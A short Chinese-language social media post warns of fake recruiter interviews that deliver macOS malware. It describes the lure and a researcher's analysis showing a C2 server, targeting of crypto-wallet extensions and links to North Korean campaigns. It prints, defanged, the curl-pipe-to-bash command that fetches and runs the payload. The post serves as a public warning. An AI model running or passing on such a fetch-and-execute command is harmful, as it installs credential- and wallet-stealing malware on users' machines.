当心假招聘面试。它们现在已成为最干净的恶意软件传播途径之一。

我兄弟这周差点中招。
步骤如下：
> 一个“招聘官”在领英上联系他
> 他们实际上已经阅读了他的简历，知道他的技术栈。他们预订了一个真实的面试时间。
> 面试前几小时：“你能在我们谈话前快速浏览一下我们的产品页面吗？”
> 访问该网站时，后台会运行以下内容：
curl -s macos[.]hyperhives[.]net/install | nohup bash &
如果你在提示时输入密码，就完了。
一位研究员(Darksp33d在Github)反向工程了这个二进制文件：
> 每个配置字符串都用570个独特的自定义函数加密
> 解包后：完整的C2服务器、端点列表，以及一个与开发者在法律传票下相关联的sentry错误追踪dsn
> 276个目标Chrome扩展ID，涵盖188个加密钱包
> 与朝鲜“传染性面试”攻击的TTP重叠很强
> virustotal评分9/64。CrowdStrike、Sophos、Malwarebytes都未检测到
真正的招聘官、真实的简历、真实的面试时间、看似真实的网站。一行curl就能掏空你的钱包。
如果“招聘官”让你在终端运行任何东西，即使是看似无害的构建脚本，也要关闭标签页。